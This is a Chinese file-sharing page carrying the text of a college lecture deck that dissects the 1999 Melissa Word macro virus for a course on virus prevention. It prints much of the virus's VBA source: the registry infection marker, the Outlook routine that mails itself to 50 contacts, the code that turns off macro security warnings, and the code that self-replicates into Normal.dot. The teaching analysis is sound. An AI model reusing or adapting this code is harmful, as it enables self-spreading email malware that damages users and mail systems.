收藏
下载资源

《梅丽莎病毒剖析》ppt课件

上传人:tian****1990 文档编号:74799568 上传时间:2019-01-29 格式:PPT 页数:20 大小:1MB
返回 下载 相关 举报
《梅丽莎病毒剖析》ppt课件_第1页
第1页 / 共20页
《梅丽莎病毒剖析》ppt课件_第2页
第2页 / 共20页
《梅丽莎病毒剖析》ppt课件_第3页
第3页 / 共20页
《梅丽莎病毒剖析》ppt课件_第4页
第4页 / 共20页
《梅丽莎病毒剖析》ppt课件_第5页
第5页 / 共20页
点击查看更多>>
资源描述

《《梅丽莎病毒剖析》ppt课件》由会员分享,可在线阅读,更多相关《《梅丽莎病毒剖析》ppt课件(20页珍藏版)》请在金锄头文库上搜索。

1、计算机病毒与防治,重庆电子工程职业学院,计算机病毒与防治课程小组,教学单元3-3 宏病毒防治,梅丽莎病毒源码分析,梅丽莎病毒特点,梅丽莎病毒行为分析,第二讲 梅丽莎病毒剖析,计算机病毒与防治课程小组,梅丽莎病毒的手工清除,梅丽莎病毒特点,计算机病毒与防治课程小组,病毒名称:梅丽莎,又称 Macro.Word97.Melissa,病毒类型: 宏病毒,危险级别: ,影响系统 Word97/Word2000,梅丽莎病毒简介,梅丽莎病毒特点,计算机病毒与防治课程小组,“梅丽莎”病毒于1999年3月爆发,它伪装成一封来自朋友或同事的“重要信息”电子邮件。用户打开邮件后,病毒会让受感染的电脑向外发送50封

2、携毒邮件。尽管这种病毒不会删除电脑系统文件,但它引发的大量电子邮件会阻塞电子邮件服务器,使之瘫痪。 1999年4月1日,在美国在线的协助下,美国政府将史密斯捉拿归案。,梅丽莎病毒简介,梅丽莎病毒特点,计算机病毒与防治课程小组,2002年5月7日美国联邦法院判决这个病毒的制造者入狱20个月和附加处罚,这是美国第一次对重要的电脑病毒制造者进行严厉惩罚。在联邦法庭上,控辩双方均认定“梅丽莎”病毒造成的损失超过8000万美元,编制这个病毒的史密斯承认,他从AOL盗取了一个帐户名,并利用这个帐户到处传播宏病毒,最后他表示认罪,认为设计电脑病毒是一个“巨大的错误”,自己的行为“不道德 ”。,病毒制造者,梅

3、丽莎病毒特点,计算机病毒与防治课程小组,该病毒通过电子邮件的方式传播, 当用户打开附件中的“list.doc”文件时,将立刻中招。 病毒的代码使用Word的VBA语言编写, 开创了此类病毒的先河, 如同病毒作者的猖狂之言“Its a new age!”。 病毒通过对注册表进行修改, 并调用Outlook发送含有病毒的邮件, 进行快速传播。由于该病毒发送的邮件的发件人是用户熟悉的, 因此往往被很多人忽视。同时, 该病毒会自动重复以上的动作, 由此引起连锁反应, 在短时间内, 造成邮件服务器的大量阻塞, 严重影响正常网络通讯。 该病毒可感染Word97、Word2000的Doc文件, 并修改通用模

4、板Normal.dot, 使受害者几乎永无“ 脱离苦海”之时。,梅丽莎病毒特点,梅丽莎病毒源码分析,计算机病毒与防治课程小组,梅丽莎病毒巧妙地利用了VBA技术对注册表、Word模板和邮件系统进行了猛烈地攻击。,1、梅丽莎病毒被激活后, 将修改注册表中的“HKEY_CURRENT_USERSoftwareMicrosoftoffice”键, 并增加项“Melissa?”, 赋值为“ by Kwyjibo”(病毒作者的大名),并将此作为是否已感染病毒的标志。 病毒中相关操作的核心代码如下所示: 读取注册表项的内容, 进行判断 If System.PrivateProfileString(“”,“H

5、KEY_CURRENT_USERSoftwareMicrosoftoffice”,“Melissa?”)“ by Kwyjibo” Then 其它操作代码 设置感染标志 System.PrivateProfileString(“HKEY_CURRENT_USERSoftwareMicrosoftoffice”,“Melissa?”)= “ by Kwyjibo” End If,梅丽莎病毒源码分析,计算机病毒与防治课程小组,2、发送邮件 在Outlook程序启动的情况下, 梅丽莎病毒将自动给地址簿中的成员(前50名)发送邮件, 主题为“Important Message From ”, 用户名“

6、”为Word软件的用户名, 邮件的正文为“Here is that document you asked for dont show anyone else; 一)”, 邮件的附件为一个文件名为“list.doc”的带毒文件。 为了实现七述功能, 病毒利用获取了地址薄中所有的邮件地址, 并发送内嵌病毒代码的邮件, 达到了疯狂传播的目的。 病毒中相关操作的核心代码如下所示:,梅丽莎病毒源码分析,计算机病毒与防治课程小组,Dim UngaDasOutlook,DasMapiName,BreakUmoffASlice 创建Outlook应用程序实例对象 Set UngaDasOutlook=Crea

7、teObject(“Outlook.Application”) 获取MAPI对象 Set DasMapiName= UngaDasOutlook.GetNameSpace(“MAPI”) If UngaDasOutlook=”Outlook” Then DasMapiName.Logon “profile”,”password” 遍历地址薄, 进行邮件发送操作 For y=1 To DasMapiName.AddressLists.Count Set AddyBook= DasMapiName.AddressLists(y) X=1 Set BreakUmoffASlice= UngaDasO

8、utlook.CreateItem(0) For oo=1 To AddyBook.AddressEntries.Count 获取第n个收件人地址 Peep=AddyBook.AddressEntries(x) 加入收件人地址 BreakUmoffASlice.Recipients.Add Peep X=x+1,梅丽莎病毒源码分析,计算机病毒与防治课程小组,If x50 Then oo= AddyBook.AddressEntries.Count Next oo 设置邮件的主题 BreakUmoffASlice.Subject=”Important Message From ” & Appli

9、cation.UserName 设置邮件的正文 BreakUmoffASlice.Body=”Here is that document you asked for dont show anyone else :-)” 加入邮件的附件 BreakUmoffASlice.Attachments.Add ActiveDocument.FullName 发送邮件 BreakUmoffASlice.Send Next y 断开连接 DasMapiName.Logoff Peep=” End If,梅丽莎病毒源码分析,计算机病毒与防治课程小组,3、修改Word模版 梅丽莎病毒激活后, 将感染Word97

10、和Word2000的文档并修改通用模板Normal.dot,使感染后的Word运行时“宏”菜单项不能使用,并且导致Word软件对文件转换、打开带有宏的文件、Normal.dot遭到修改后都不会出现警告, 使病毒的魔爪“ 天衣无缝”。最后, 将病毒自身的代码和所做的设置修改,利用一个很高超的方法一同写入Normal.dot之中, 使用户以后打开Word时病毒反复发作。 病毒中相关操作的核心代码如下所示:,梅丽莎病毒源码分析,计算机病毒与防治课程小组,使“ 宏” 工具栏的“ 安全” 项无效 CommandBars(“Macro”).Controls(“Security”).Enabled=Fals

11、e 使“工具”菜单栏的“宏”项无效 CommandBars(“Tools”).Controls(“Macro”).Enabled=False 将“0”(1-1)值赋于ConfirmConversions属性,使“文件转换”对话框不显示 Options.ConfirmConversions=(1-1) 将,“0”(1-1)值赋于VirusProtection属性, 使“宏警告”对话框不显示 Options.VirusProtection=(1-1) 将“0”(1-1)值赋于SaveNormalPrompt属性,使Normal.dot被修改后不显示警告对话框 Options.SaveNormalP

12、rompt=(1-1) 获取当前文档的VBA工程的第1个模块名称 Set ADI1=ActiveDocument.VBProject.VBComponents.Item(1) 获取Normal.dot的VBA工程的第1个模块名称 Set NTI1=NormalTemplate.VBProject.VBComponents.Item(1) NTCL=NTI1.CodeModule.CountOfLines ADCL=ADI1.CodeModule.CountOfLines BGN=2,梅丽莎病毒源码分析,计算机病毒与防治课程小组,如果当前文档未感染 If ADI1.Name”Melissa” T

13、hen 修改VBA工程的第1个模块名称为“Melissa” If ADCL0 Then ADI1.CodeModule.DeleteLines 1,ADCL Set ToInfect=ADI1 ADI1.Name=“Melissa“ DoAD=True End If 如果Normal.dot未感染 If NTI1.Name “Melissa” Then 修改VBA工程的第1个模块名称为“Melissa“ If NTCL0 Then NTI1.CodeModule.DeleteLines 1,NTCL Set ToInfect=NTI1 NTI1.Name=”Melissa” DoNT=True

14、 End If,梅丽莎病毒源码分析,计算机病毒与防治课程小组,如果都已感染, 跳转执行以后的命令 If DoNT True And DoAD True Then GoTo CY 开始感染Normal.dot If DoNT=True Then Do While ADI1.CodeModule.Lines(1,1)=” ADI1.CodeModule.DeleteLines 1 Loop ToInfect.CodeModule.AddFromString(“Private Sub Document_Close()”) Do While ADI1.CodeModule.Lines(BGN,1) “

15、” ToInfect.CodeModule.InsertLines BGN,ADI1.CodeModule.Lines(BGN,1) BGN=BGN+1 Loop End If,梅丽莎病毒源码分析,计算机病毒与防治课程小组,If DoAD=True Then 开始感染当前文档 Do While NTI1.CodeModule.Lines(1,1)=” NTI1.CodeModule.DeleteLines 1 Loop ToInfect.CodeModule.AddFromString(“Private Sub Document.Open()”) Do While NTI1.CodeModul

16、e.Lines(BGN,1)” ToInfect.CodeModule.InsertLines BGN,NTI1.CodeModule.Lines(BGN,1) BGN=BGN+1 Loop End If CYA: 保存被修改的当前文档和Normal.dot If NTCL0 And ADCL=0 And (InStr(1,ActiveDocument.Name,”Document”)=False) Then ActiveDocument.SaveAs FileName=ActiveDocument.FullName ElseIf (InStr(1,ActiveDocument.Name,”Document”)False) Then ActiveDocument.Saved=True End If Enf If,梅丽莎病毒主要行为分析,计算机病毒与防治课程小组,梅丽莎病毒源码,梅丽莎病毒对注

展开阅读全文
相关资源
相关搜索

当前位置:首页 > 高等教育 > 大学课件

电脑版 |金锄头文库版权所有
经营许可证:蜀ICP备13022795号 | 川公网安备 51140202000112号